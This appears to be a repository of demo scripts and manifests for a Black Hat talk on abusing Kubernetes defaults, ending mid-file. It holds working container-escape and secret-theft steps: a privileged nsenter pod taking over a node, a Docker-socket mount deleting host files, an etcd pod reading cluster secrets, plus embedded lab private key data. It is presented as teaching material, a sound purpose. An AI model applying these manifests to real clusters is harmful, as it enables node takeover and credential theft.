├── README.md ├── demo.sh ├── demos ├── dind.sh ├── etcdlient.sh ├── k8s_root.sh └── psp-enforce.sh ├── dind ├── dind-no-privs.yaml └── dind-privs.yaml ├── etcd-attack └── etcdclient.yaml ├── images └── images ├── join.sh ├── k8s_root └── r00t.yaml ├── kind ├── admin.conf ├── canal.yaml ├── config └── fix_sysctls.sh ├── lib └── demo-magic.sh ├── podpresets └── preset.yaml ├── psp ├── allow-all-clusterrolebinding.yaml ├── allow-kubeadm-clusterrolebinding.yaml ├── allow-restricted-clusterrolebinding.yaml ├── permissive-psp.yaml ├── psp-permissive-clusterrole.yaml ├── psp-restrictive-clusterrole.yaml └── restrictive-psp.yaml └── setup.sh /README.md: -------------------------------------------------------------------------------- 1 | ## Resources for [The path less traveled: Abusing Kubernetes Defaults](https://www.blackhat.com/us-19/briefings/schedule/index.html#the-path-less-traveled-abusing-kubernetes-defaults-17049) 2 | 3 | ### [Video here](https://www.youtube.com/watch?v=HmoVSmTIOxM) 4 | 5 | This repo has all of the manifests and demo scripts used for this presentation. 6 | 7 | The cluster was built using kind.sigs.k8s.io and run entirely from the presenter laptop. 8 | 9 | You can run the [setup.sh](./setup.sh) script to populate the images that will be used 10 | 11 | Run all of the demo scripts from the root directory of this repo. 12 | 13 | The `k8s_root` and `dind` demos do require that the laptop be running some linux distribution and docker. 14 | 15 | For both of these examples we are joining the laptop to the kind cluster as a node. 16 | 17 | 18 | Other resources: 19 | 20 | - report a vuln [k8s.io/security](https://k8s.io/security) 21 | - ask questions! [slack.k8s.io](https://slack.k8s.io) #security and #sig-auth 22 | - [CVEs](https://cve.mitre.org/) are announced as part of the [announce google group](https://groups.google.com/forum/#!forum/kubernetes-announce) 23 | 24 | 25 | Any questions or feedback please reach out! 
[Duffie Cooley](https://twitter.com/mauilion) and [Ian Coldwater](https://twitter.com/IanColdwater)
48 | pe "hostname" 49 | pe "sudo touch /etc/flag" 50 | pe "kubectl exec dind-no-privs -- docker run --rm -v /etc:/host/etc bash:5 rm host/etc/flag" 51 | pe "ls -al /etc/flag" 52 | p "we have complete control over the host" 53 | 54 | # show a prompt so as not to reveal our true nature after 55 | # the demo has concluded 56 | p "" 57 | -------------------------------------------------------------------------------- /demos/etcdlient.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | ######################## 4 | # include the magic 5 | ######################## 6 | . lib/demo-magic.sh 7 | 8 | 9 | ######################## 10 | # Configure the options 11 | ######################## 12 | 13 | # 14 | # speed at which to simulate typing. bigger num = faster 15 | # 16 | # TYPE_SPEED=20 17 | 18 | # 19 | # custom prompt 20 | # 21 | # see http://www.tldp.org/HOWTO/Bash-Prompt-HOWTO/bash-prompt-escape-sequences.html for escape sequences 22 | # 23 | DEMO_PROMPT="${GREEN}➜ ${CYAN}\W " 24 | SERVER="$(kubectl config view -o jsonpath={.clusters[0].cluster.server})" 25 | SECRET="$(kubectl get sa -n kube-system clusterrole-aggregation-controller -o jsonpath={.secrets[0].name})" 26 | TOKEN="$(kubectl get -n kube-system secret ${SECRET} -o jsonpath={.data.token}|base64 -d)" 27 | TYPE_SPEED=20 28 | # hide the evidence 29 | clear 30 | 31 | 32 | # put your demo awesomeness here 33 | #if [ ! 
-d "stuff" ]; then 34 | # pe "mkdir stuff" 35 | #fi 36 | 37 | #pe "cd stuff" 38 | 39 | p "etcd attack demo" 40 | pe "vim etcd-attack/etcdclient.yaml" 41 | pe "kubectl apply -f etcd-attack/" 42 | pe "kubectl exec etcdclient -- etcdctl member list" 43 | pe "kubectl exec etcdclient -- etcdctl get '' --keys-only --from-key | grep secrets" 44 | pe "kubectl exec etcdclient -- etcdctl get /registry/secrets/kube-system/${SECRET}" 45 | unset TYPE_SPEED 46 | pe "kubectl auth can-i --list --token ${TOKEN} --server=${SERVER}" 47 | TYPE_SPEED=20 48 | # show a prompt so as not to reveal our true nature after 49 | # the demo has concluded 50 | p "thanks!" 51 | p "" 52 | -------------------------------------------------------------------------------- /demos/k8s_root.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | ######################## 4 | # include the magic 5 | ######################## 6 | . lib/demo-magic.sh 7 | 8 | 9 | ######################## 10 | # Configure the options 11 | ######################## 12 | 13 | # 14 | # speed at which to simulate typing. bigger num = faster 15 | # 16 | # TYPE_SPEED=20 17 | 18 | # 19 | # custom prompt 20 | # 21 | # see http://www.tldp.org/HOWTO/Bash-Prompt-HOWTO/bash-prompt-escape-sequences.html for escape sequences 22 | # 23 | DEMO_PROMPT="${GREEN}➜ ${CYAN}\W " 24 | 25 | kubectl create deployment nginx --image=nginx:stable 26 | kubectl scale deployment nginx --replicas 5 27 | kubectl get pods 28 | clear 29 | 30 | 31 | # put your demo awesomeness here 32 | #if [ ! 
-d "stuff" ]; then 33 | # pe "mkdir stuff" 34 | #fi 35 | 36 | #pe "cd stuff" 37 | 38 | pe "vim k8s_root/r00t.yaml" 39 | pe "kubectl apply -f k8s_root/r00t.yaml" 40 | pe "kubectl exec -it r00t -- nsenter --help" 41 | p "I've used nsenter to solve the mystery of how a pod is actually configured" 42 | p "first let's find the pid of an nginx process" 43 | pe "kubectl exec -ti r00t -- pgrep -a nginx" 44 | pe "kubectl exec -ti r00t -- nsenter -n -t $(pgrep nginx | head -n1) ss -ln" 45 | pe "kubectl exec -ti r00t -- nsenter -m -t $(pgrep nginx | head -n1) cat /etc/nginx/nginx.conf" 46 | p "this all works because every process has a /proc/PID/ns directory with a mapping of the namespaces that the process is bound to" 47 | pe "kubectl exec -ti r00t -- ls -al /proc/$(pgrep nginx| head -n 1)/ns" 48 | p "but what else can we do here?" 49 | p "linux is namespacing all the things all the time not just containers" 50 | p "we can use nsenter to take over the node without hostPath!" 51 | pe "kubectl exec -it r00t -- nsenter -a -t 1 bash" 52 | 53 | 54 | 55 | # show a prompt so as not to reveal our true nature after 56 | # the demo has concluded 57 | p "" 58 | -------------------------------------------------------------------------------- /demos/psp-enforce.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | ######################## 4 | # include the magic 5 | ######################## 6 | . lib/demo-magic.sh 7 | 8 | 9 | ######################## 10 | # Configure the options 11 | ######################## 12 | 13 | # 14 | # speed at which to simulate typing. 
bigger num = faster 15 | # 16 | # TYPE_SPEED=20 17 | 18 | # 19 | # custom prompt 20 | # 21 | # see http://www.tldp.org/HOWTO/Bash-Prompt-HOWTO/bash-prompt-escape-sequences.html for escape sequences 22 | # 23 | DEMO_PROMPT="${GREEN}➜ ${CYAN}\W " 24 | 25 | kubectl delete clusterrolebinding allow-all-kube-system 26 | kubectl create ns secure 27 | kubectl create rolebinding secure-admin -n secure --clusterrole=admin --serviceaccount=secure:default 28 | # hide the evidence 29 | clear 30 | 31 | 32 | # put your demo awesomeness here 33 | #if [ ! -d "stuff" ]; then 34 | # pe "mkdir stuff" 35 | #fi 36 | 37 | #pe "cd stuff" 38 | p "First let's look at the pod security policies available in the cluster" 39 | pe "kubectl describe psp" 40 | p "Now let's try to deploy some of these pods with a only the restrictive psp policy in place." 41 | pe "kubectl apply -n secure -f etcd-attack/etcdclient.yaml --as system:serviceaccount:secure:default" 42 | p "what about the dind manifest" 43 | pe "kubectl apply -n secure -f dind/dind-no-privs.yaml --as system:serviceaccount:secure:default" 44 | p "we can still deploy reasonable things though! 
let's try nginx" 45 | pe "kubectl create -n secure deployment nginx --image=nginx:stable --as system:serviceaccount:secure:default" 46 | pe "kubectl scale -n secure deployment nginx --replicas=3 --as system:serviceaccount:secure:default" 47 | pe "kubectl get pods -n secure" 48 | # show a prompt so as not to reveal our true nature after 49 | # the demo has concluded 50 | p "" 51 | kubectl delete ns secure --wait=false >/dev/null 2>&1 52 | 53 | -------------------------------------------------------------------------------- /dind/dind-no-privs.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | creationTimestamp: null 5 | labels: 6 | run: dind 7 | name: dind-no-privs 8 | annotations: 9 | seccomp.security.alpha.kubernetes.io/pod: docker/default 10 | spec: 11 | securityContext: 12 | runAsUser: 1000 13 | runAsGroup: 132 14 | fsGroup: 1000 15 | containers: 16 | - image: quay.io/mauilion/dind:master 17 | name: dind 18 | resources: {} 19 | volumeMounts: 20 | - mountPath: /var/run/docker.sock 21 | name: docker-socket 22 | readOnly: true 23 | securityContext: 24 | allowPrivilegeEscalation: false 25 | capabilities: 26 | drop: 27 | - all 28 | dnsPolicy: ClusterFirst 29 | nodeName: lynx 30 | volumes: 31 | - hostPath: 32 | path: /var/run/docker.sock 33 | name: docker-socket 34 | -------------------------------------------------------------------------------- /dind/dind-privs.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | creationTimestamp: null 5 | labels: 6 | run: dind 7 | name: dind 8 | spec: 9 | containers: 10 | - image: quay.io/mauilion/dind:master 11 | name: dind 12 | resources: {} 13 | securityContext: 14 | privileged: true 15 | dnsPolicy: ClusterFirst 16 | hostPID: true 17 | volumes: 18 | - hostPath: 19 | path: /var/run/docker.sock 20 | name: docker-socket 21 | 
-------------------------------------------------------------------------------- /etcd-attack/etcdclient.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | creationTimestamp: null 5 | labels: 6 | component: etcdclient 7 | tier: debug 8 | name: etcdclient 9 | spec: 10 | containers: 11 | - command: 12 | - sleep 13 | - 9999d 14 | image: k8s.gcr.io/etcd:3.3.10 # using the etcd image that ships with kubernetes. 15 | name: etcdclient 16 | env: 17 | - name: ETCDCTL_API 18 | value: "3" 19 | - name: ETCDCTL_CACERT 20 | value: /etc/kubernetes/pki/etcd/ca.crt 21 | - name: ETCDCTL_CERT 22 | value: /etc/kubernetes/pki/etcd/healthcheck-client.crt 23 | - name: ETCDCTL_KEY 24 | value: /etc/kubernetes/pki/etcd/healthcheck-client.key 25 | - name: ETCDCTL_ENDPOINTS 26 | value: "https://127.0.0.1:2379" 27 | - name: ETCDCTL_CLUSTER 28 | value: "true" 29 | volumeMounts: 30 | - mountPath: /etc/kubernetes/pki/etcd 31 | name: etcd-certs 32 | readOnly: true 33 | hostNetwork: true #hostNetwork!!! 34 | nodeName: kind-control-plane #doing the work of the scheduler directly! 35 | volumes: 36 | - hostPath: #hostpath!!! 
37 | path: /etc/kubernetes/pki/etcd 38 | type: DirectoryOrCreate 39 | name: etcd-certs 40 | -------------------------------------------------------------------------------- /images/images: -------------------------------------------------------------------------------- 1 | quay.io/mauilion/dind:master 2 | calico/cni:v3.8.1 3 | calico/pod2daemon-flexvol:v3.8.1 4 | calico/node:v3.8.1 5 | quay.io/coreos/flannel:v0.11.0 6 | alpine:3.7 7 | nginx:stable 8 | bash:5 9 | -------------------------------------------------------------------------------- /join.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | sudo systemctl unmask kubelet 3 | token=$(docker exec kind-control-plane kubeadm token create --print-join-command) 4 | sudo ${token} --ignore-preflight-errors=all 5 | -------------------------------------------------------------------------------- /k8s_root/r00t.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | labels: 5 | run: r00t 6 | name: r00t 7 | spec: 8 | containers: 9 | - command: 10 | - nsenter # super powerful 11 | - --mount=/proc/1/ns/mnt # mount mount namespace of the underlying node 12 | - -- 13 | - /bin/sleep 14 | - 99d 15 | image: alpine:3.7 16 | name: lol 17 | securityContext: 18 | privileged: true #crazy powers engage! 19 | dnsPolicy: ClusterFirst 20 | hostPID: true #gives us what's needed to enumerate all the processes with nsenter 21 | nodeName: lynx #host to do this to. 
22 | -------------------------------------------------------------------------------- /kind/admin.conf: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | clusters: 3 | - cluster: 4 | certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUN5RENDQWJDZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRFNU1EZ3dNakUzTkRneU9Gb1hEVEk1TURjek1ERTNORGd5T0Zvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTVlZCldKUGNWRTZ6MGJNY0dkSU0wTi9MQmxkV2NqeXVkaEFNQ0dhSm4wenQwZ3hEaTJQQlJuU28rclg5cEh5WlJvWk4KalZBdzN1OXF6dVpCalk1dnpRN1pmWjdwWnI2K1Z0MFRYMVRwb05NTFBOcFpOT0MrMXJPMDQ3RU56L3VEZElxdQpOdDVLam5JNis5Ti90K0h2Ymg0cWc3UTZnbWJidXhxRk5RWHBaYnMrc2NvT2taeE5CeHdyMXRONjByU2lyaTJsClhlNm9CYTBoT1RQdEVKR05NalkwRnBvYWNvdmY3V0pmamJ4MUh4ejkycjN2TW1DM2tDRHhhc25wSFRBL3pmQVQKMzNETDlxTEZQeGFaUzVtU1FsYVRwb09YcHdIUjVFQ0hpd0pjSnd2clpUZzRZWkZ0RENWcVpCOU1LbzdCVjNDdgpVUnpBNVprN1NEU0tQN0xqK1RVQ0F3RUFBYU1qTUNFd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0RRWUpLb1pJaHZjTkFRRUxCUUFEZ2dFQkFJUmxCV1V2anF2akFIeWZFSzgrRExNSTVZNkcKQjM0dVVOc2ZyVXVsUGszZTMvaE5oMmVDUm50M2JtVVN4M3hlaU9nL2c2MHlNM0Q0NGI4MUxJZk95b2ZJY0I5Wgp2THB2RkFJdHRSOXMxNnZ4YVVlSU9ZNVNYdE55cEF2SzNya0lPaHBxbWdjQWxIYThFcVBvSjdrRUhXM2FIOXl1ClZUb2p6ZUJqMXgraDQ4SW82MTEyUXJCOVhSQjkwRHUvbkpkblVPR2k4N0gyTCtSb2kvbyt5YWd1ZmduTFZ5TkgKMVB2UTNzSk1BTWNGeHJVbFBPSW5iUUU0c3ZTTTkwampGSnF0TWYzMHEvcFVtU3A4VTltRFRNRHd6VFArRVJWZQpOdGQzcTNzdzBOOGxIZTBiSnliRHFCTk9aRWJ5elo3Y3p6ckFtdEtUVWI5RXBEbmk2bTZONnNHdUJyMD0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo= 5 | server: https://172.17.0.4:6443 6 | name: kind 7 | contexts: 8 | - context: 9 | cluster: kind 10 | user: kubernetes-admin 11 | name: kubernetes-admin@kind 12 | current-context: kubernetes-admin@kind 13 | kind: Config 14 | preferences: {} 15 | users: 16 | - name: kubernetes-admin 17 | user: 18 | client-certificate-data: 
LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUM4akNDQWRxZ0F3SUJBZ0lJVG4rQU9kdmp2MjB3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB4T1RBNE1ESXhOelE0TWpoYUZ3MHlNREE0TURFeE56UTRNekphTURReApGekFWQmdOVkJBb1REbk41YzNSbGJUcHRZWE4wWlhKek1Sa3dGd1lEVlFRREV4QnJkV0psY201bGRHVnpMV0ZrCmJXbHVNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQXJBbE1JVkFJNXlGOWtvc2kKY0djdHBka0NUa293ZVVRZmtxTkY4RHRPUlVDRXFXeFRNdlA1QzdxNFFzUitQd0FIc1AwcHVWN2M2Wjhya2xsVQoyLzdYUGRuQXZLUnpUOHVhT2JJQ20wSDJJMDVCUithV0plcDR1Y0ExdUJ1SW5Jd3hYZEhsS0pjWmJnTnc0RGlrClFxcVc2S3QwWlpVUUsrV0lZdUxENjFtaXBHZ1NsSDVYeDBpd1VaT3NRTjNkbDBodkk0cTlpb1lpa1pJazM1MWYKVzZHaVNNS2QxTEh3ci8zNnZvZG1JMFNxODNyWTRkTjBTM0lUTEQzQWNKSFdFYlNlam9OQS9tN3N0eXJ5Ym4zdQo2MzFURmZMczVMK1F1bk1qYzhGQ1oyYkpaam13MDIvRFhFSEh4OVFzNDAweTdLKzJwaDEvY0cxSmRLSDREYStECnFLSjRuUUlEQVFBQm95Y3dKVEFPQmdOVkhROEJBZjhFQkFNQ0JhQXdFd1lEVlIwbEJBd3dDZ1lJS3dZQkJRVUgKQXdJd0RRWUpLb1pJaHZjTkFRRUxCUUFEZ2dFQkFCQmtBVXRmcU9ZTllKc3hvTkVYWlMwVDc2SzdVL2o2Rks5TApxRHVHWXNLeGN2RWFKc05vNDU4Nm51ZEN3NkZyaVFWdUNYTGdxdzFCVkZCVmxLQy9KdFFVUWxadzFwZTdZWGZqCjIzMXFoT2NMMEN6aXMrN3NrdkNMdkJGQTZXNmVyNjVOU0F0b3ZDcHZHbWdRQmEzMGh1RkR6ajdiUUVhblRETjQKaWFRYTZ6RGRCYXFua3JjNTZxTm8vOWU2RW5iaTA2cmh2VzV3Wklwckx5YThIamtPcVRsajFtMGVxQ1NTczRCdQpTVEtzOWJWZWt5YVovbTd2SnFFYURwbUZUU1pVaHQvdk44WTNVVkZvVTB2Ym5NTGUxVjlrYkRKUVlTQmM0OHFqCjlYb29FbDRNK0pYQThzVWdjeFRSMklOajRDNDhTUmkwNU83N21sL3Q5T2JGbERLdzRKVT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo= 19 | client-key-data: 
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFb2dJQkFBS0NBUUVBckFsTUlWQUk1eUY5a29zaWNHY3RwZGtDVGtvd2VVUWZrcU5GOER0T1JVQ0VxV3hUCk12UDVDN3E0UXNSK1B3QUhzUDBwdVY3YzZaOHJrbGxVMi83WFBkbkF2S1J6VDh1YU9iSUNtMEgySTA1QlIrYVcKSmVwNHVjQTF1QnVJbkl3eFhkSGxLSmNaYmdOdzREaWtRcXFXNkt0MFpaVVFLK1dJWXVMRDYxbWlwR2dTbEg1WAp4MGl3VVpPc1FOM2RsMGh2STRxOWlvWWlrWklrMzUxZlc2R2lTTUtkMUxId3IvMzZ2b2RtSTBTcTgzclk0ZE4wClMzSVRMRDNBY0pIV0ViU2Vqb05BL203c3R5cnlibjN1NjMxVEZmTHM1TCtRdW5NamM4RkNaMmJKWmptdzAyL0QKWEVISHg5UXM0MDB5N0srMnBoMS9jRzFKZEtINERhK0RxS0o0blFJREFRQUJBb0lCQUg5YnZxMW10OENNRFk5ZwpTMVdWUExqcnA0Wlg2L3pLVHVsYTBCcmhmTGRONVNnYjFwZ0EvNTBNVlA2d3dwbFhKMXFDZ05JSGhWbTZpU0lsCjJlbW5ocWIyUG5ZbzlHamRYTVpibnd4YlQ2R2hmRGlEWHlLZ3ExRXdGMVM5cFd2bmFXQ0FVN3F4NlpTRkhab1EKdEtIWjhqQTdSY2N5REMvREZDM0luS3Z0eHJjWVVmZGZXRGNuV1NFR2ZNYzltMUYyczlYaWdzY2EyZ0M1bXh2OAp1WVpBRkREU05BUVRreWxDVW52eWpvNGhheFM0d3hUaUIrWXZicytKcEdra2U2RFZuaktHNkFjN2pCM2NJWENZCitMa1lhckxZeUVESitPSytXQnQwYzlmeWEyNkVoYXJGOEdBMmRXMzdmSnFnM2tnOFQxN29NWFlaWlMzVjZESVEKQVBuQ3JPMENnWUVBMG9NTU9FamdueFE2M2t0VkpyLzEwYWs1K0c5djNrd2txWk5BZkxEcEtuTVFnZ3B3VUJISgprdkFuVmVOeDlTUkgweVNVNmxvRHJGam04V3BtcVZIeGRNU3g1cnJTU1ZCWHpCVm14NmZhQ09CNWVkS21GRUI1CkJRRElwS0JMd2pkSGkySE5MZmh5RXB6SlFqdW1ZZmxoTExHVUYyNDhCWFl0R2dHbHpjckRFVk1DZ1lFQTBUWGkKT0J4K0p6MmMzS1BJZmwzSW4xMGFYRVk1YmNDRHdTNnpBQ0F1ei9xdWt2d1lWbWoveTN1dEtwU29wOFhzamtmMwoyeUdvSHc5Y3QvamlDekJZZzdHaWtYWDZjb1gxeXpGUENQeS9VSUNhbmZjMFBBcVZadUYxU0ZxNE5vajM4RnIrCjVvS1FUVWJiQTNGN0J1bWpHaWZUbmtxcWV5OVpIanNFMHYwcllFOENnWUJ2U3dreTJKU29oYkY1eEtvSUNvU1QKaTd3eU0vZ1l0bmpMamlZUnhoWC9jMFhPK21YV2J4RDZ0aXlWbytHamtNTElSaGJVcnpJeDgrNWt3N1B5NEhlZgpIRDVSbFlPSGJ3cDd3dlRMcVZvRVIyanhsd1Jtd0k4NnJlZGw0YmtydkwzK1duNTNSMXBIck14YVQ5N3UvVUQ2CnVBZHJPOFJQdnVLcFZTV3JYdjh5TVFLQmdBZFI0RkZnUmRXdnBTNWZHS083T2tyQklpdjZWUVlQQjAwYUNpOUYKOFAxYjR3SEhpajV6dkFkdGsxaDdEUStac0RZbU5IalpTNTJTbHdiazBWdmMzQ3YzYWgyMnlBVjd4R2JRbWRoUgpwNHYwZy9Sazh0SHErT0U1b0RYZzNyTWh4Yk1HTEFiNnFIdmJyOHdHQzJ6cGZjaHJmazc2Zzg1OWtKdXJLdmNLCjNwcW5Bb0dBSWRUdkhMQ3VOeHEvcCthTWx1OWdpNFdFTytuTG1W
dHYvNjRyb1ZHeklzeXRDcVlXRC9STUVQZ20KZmZxNVg5ZkY1RVhTa2NkWXllVFVNa2kzaVhLSVQxZ2VNM3plK0FHN3B4dlltVW1VR0NzVVc5REhqMHVLdW1Cbgo3UVBDQUV4M3pENE9ycDRRa1JvdkZhTCtRdWQrYlk1MEJwTkRPNTZoaklIamtEaUFEcTA9Ci0tLS0tRU5EIFJTQSBQUklWQVRFIEtFWS0tLS0tCg== 20 | -------------------------------------------------------------------------------- /kind/canal.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | # Source: calico/templates/calico-config.yaml 3 | # This ConfigMap is used to configure a self-hosted Canal installation. 4 | kind: ConfigMap 5 | apiVersion: v1 6 | metadata: 7 | name: canal-config 8 | namespace: kube-system 9 | data: 10 | # Typha is disabled. 11 | typha_service_name: "none" 12 | # The interface used by canal for host <-> host communication. 13 | # If left blank, then the interface is chosen using the node's 14 | # default route. 15 | canal_iface: "" 16 | 17 | # Whether or not to masquerade traffic to destinations not within 18 | # the pod network. 19 | masquerade: "true" 20 | 21 | # The CNI network configuration to install on each node. The special 22 | # values in this config will be automatically populated. 23 | cni_network_config: |- 24 | { 25 | "name": "k8s-pod-network", 26 | "cniVersion": "0.3.1", 27 | "plugins": [ 28 | { 29 | "type": "calico", 30 | "log_level": "info", 31 | "datastore_type": "kubernetes", 32 | "nodename": "__KUBERNETES_NODE_NAME__", 33 | "ipam": { 34 | "type": "host-local", 35 | "subnet": "usePodCidr" 36 | }, 37 | "policy": { 38 | "type": "k8s" 39 | }, 40 | "kubernetes": { 41 | "kubeconfig": "__KUBECONFIG_FILEPATH__" 42 | } 43 | }, 44 | { 45 | "type": "portmap", 46 | "snat": true, 47 | "capabilities": {"portMappings": true} 48 | } 49 | ] 50 | } 51 | 52 | # Flannel network configuration. Mounted into the flannel container. 
53 | net-conf.json: | 54 | { 55 | "Network": "10.244.0.0/16", 56 | "Backend": { 57 | "Type": "vxlan" 58 | } 59 | } 60 | 61 | --- 62 | # Source: calico/templates/kdd-crds.yaml 63 | apiVersion: apiextensions.k8s.io/v1beta1 64 | kind: CustomResourceDefinition 65 | metadata: 66 | name: felixconfigurations.crd.projectcalico.org 67 | spec: 68 | scope: Cluster 69 | group: crd.projectcalico.org 70 | version: v1 71 | names: 72 | kind: FelixConfiguration 73 | plural: felixconfigurations 74 | singular: felixconfiguration 75 | --- 76 | 77 | apiVersion: apiextensions.k8s.io/v1beta1 78 | kind: CustomResourceDefinition 79 | metadata: 80 | name: bgpconfigurations.crd.projectcalico.org 81 | spec: 82 | scope: Cluster 83 | group: crd.projectcalico.org 84 | version: v1 85 | names: 86 | kind: BGPConfiguration 87 | plural: bgpconfigurations 88 | singular: bgpconfiguration 89 | 90 | --- 91 | 92 | apiVersion: apiextensions.k8s.io/v1beta1 93 | kind: CustomResourceDefinition 94 | metadata: 95 | name: ippools.crd.projectcalico.org 96 | spec: 97 | scope: Cluster 98 | group: crd.projectcalico.org 99 | version: v1 100 | names: 101 | kind: IPPool 102 | plural: ippools 103 | singular: ippool 104 | 105 | --- 106 | 107 | apiVersion: apiextensions.k8s.io/v1beta1 108 | kind: CustomResourceDefinition 109 | metadata: 110 | name: hostendpoints.crd.projectcalico.org 111 | spec: 112 | scope: Cluster 113 | group: crd.projectcalico.org 114 | version: v1 115 | names: 116 | kind: HostEndpoint 117 | plural: hostendpoints 118 | singular: hostendpoint 119 | 120 | --- 121 | 122 | apiVersion: apiextensions.k8s.io/v1beta1 123 | kind: CustomResourceDefinition 124 | metadata: 125 | name: clusterinformations.crd.projectcalico.org 126 | spec: 127 | scope: Cluster 128 | group: crd.projectcalico.org 129 | version: v1 130 | names: 131 | kind: ClusterInformation 132 | plural: clusterinformations 133 | singular: clusterinformation 134 | 135 | --- 136 | 137 | apiVersion: apiextensions.k8s.io/v1beta1 138 | kind: 
CustomResourceDefinition 139 | metadata: 140 | name: globalnetworkpolicies.crd.projectcalico.org 141 | spec: 142 | scope: Cluster 143 | group: crd.projectcalico.org 144 | version: v1 145 | names: 146 | kind: GlobalNetworkPolicy 147 | plural: globalnetworkpolicies 148 | singular: globalnetworkpolicy 149 | 150 | --- 151 | 152 | apiVersion: apiextensions.k8s.io/v1beta1 153 | kind: CustomResourceDefinition 154 | metadata: 155 | name: globalnetworksets.crd.projectcalico.org 156 | spec: 157 | scope: Cluster 158 | group: crd.projectcalico.org 159 | version: v1 160 | names: 161 | kind: GlobalNetworkSet 162 | plural: globalnetworksets 163 | singular: globalnetworkset 164 | 165 | --- 166 | 167 | apiVersion: apiextensions.k8s.io/v1beta1 168 | kind: CustomResourceDefinition 169 | metadata: 170 | name: networkpolicies.crd.projectcalico.org 171 | spec: 172 | scope: Namespaced 173 | group: crd.projectcalico.org 174 | version: v1 175 | names: 176 | kind: NetworkPolicy 177 | plural: networkpolicies 178 | singular: networkpolicy 179 | 180 | --- 181 | 182 | apiVersion: apiextensions.k8s.io/v1beta1 183 | kind: CustomResourceDefinition 184 | metadata: 185 | name: networksets.crd.projectcalico.org 186 | spec: 187 | scope: Namespaced 188 | group: crd.projectcalico.org 189 | version: v1 190 | names: 191 | kind: NetworkSet 192 | plural: networksets 193 | singular: networkset 194 | --- 195 | # Source: calico/templates/rbac.yaml 196 | 197 | # Include a clusterrole for the calico-node DaemonSet, 198 | # and bind it to the calico-node serviceaccount. 199 | kind: ClusterRole 200 | apiVersion: rbac.authorization.k8s.io/v1 201 | metadata: 202 | name: calico-node 203 | rules: 204 | # The CNI plugin needs to get pods, nodes, and namespaces. 205 | - apiGroups: [""] 206 | resources: 207 | - pods 208 | - nodes 209 | - namespaces 210 | verbs: 211 | - get 212 | - apiGroups: [""] 213 | resources: 214 | - endpoints 215 | - services 216 | verbs: 217 | # Used to discover service IPs for advertisement. 
218 | - watch 219 | - list 220 | # Used to discover Typhas. 221 | - get 222 | - apiGroups: [""] 223 | resources: 224 | - nodes/status 225 | verbs: 226 | # Needed for clearing NodeNetworkUnavailable flag. 227 | - patch 228 | # Calico stores some configuration information in node annotations. 229 | - update 230 | # Watch for changes to Kubernetes NetworkPolicies. 231 | - apiGroups: ["networking.k8s.io"] 232 | resources: 233 | - networkpolicies 234 | verbs: 235 | - watch 236 | - list 237 | # Used by Calico for policy information. 238 | - apiGroups: [""] 239 | resources: 240 | - pods 241 | - namespaces 242 | - serviceaccounts 243 | verbs: 244 | - list 245 | - watch 246 | # The CNI plugin patches pods/status. 247 | - apiGroups: [""] 248 | resources: 249 | - pods/status 250 | verbs: 251 | - patch 252 | # Calico monitors various CRDs for config. 253 | - apiGroups: ["crd.projectcalico.org"] 254 | resources: 255 | - globalfelixconfigs 256 | - felixconfigurations 257 | - bgppeers 258 | - globalbgpconfigs 259 | - bgpconfigurations 260 | - ippools 261 | - ipamblocks 262 | - globalnetworkpolicies 263 | - globalnetworksets 264 | - networkpolicies 265 | - networksets 266 | - clusterinformations 267 | - hostendpoints 268 | verbs: 269 | - get 270 | - list 271 | - watch 272 | # Calico must create and update some CRDs on startup. 273 | - apiGroups: ["crd.projectcalico.org"] 274 | resources: 275 | - ippools 276 | - felixconfigurations 277 | - clusterinformations 278 | verbs: 279 | - create 280 | - update 281 | # Calico stores some configuration information on the node. 282 | - apiGroups: [""] 283 | resources: 284 | - nodes 285 | verbs: 286 | - get 287 | - list 288 | - watch 289 | # These permissions are only requried for upgrade from v2.6, and can 290 | # be removed after upgrade or on fresh installations. 
291 | - apiGroups: ["crd.projectcalico.org"] 292 | resources: 293 | - bgpconfigurations 294 | - bgppeers 295 | verbs: 296 | - create 297 | - update 298 | --- 299 | # Flannel ClusterRole 300 | # Pulled from https://github.com/coreos/flannel/blob/master/Documentation/kube-flannel-rbac.yml 301 | kind: ClusterRole 302 | apiVersion: rbac.authorization.k8s.io/v1 303 | metadata: 304 | name: flannel 305 | rules: 306 | - apiGroups: [""] 307 | resources: 308 | - pods 309 | verbs: 310 | - get 311 | - apiGroups: [""] 312 | resources: 313 | - nodes 314 | verbs: 315 | - list 316 | - watch 317 | - apiGroups: [""] 318 | resources: 319 | - nodes/status 320 | verbs: 321 | - patch 322 | --- 323 | # Bind the flannel ClusterRole to the canal ServiceAccount. 324 | kind: ClusterRoleBinding 325 | apiVersion: rbac.authorization.k8s.io/v1 326 | metadata: 327 | name: canal-flannel 328 | roleRef: 329 | 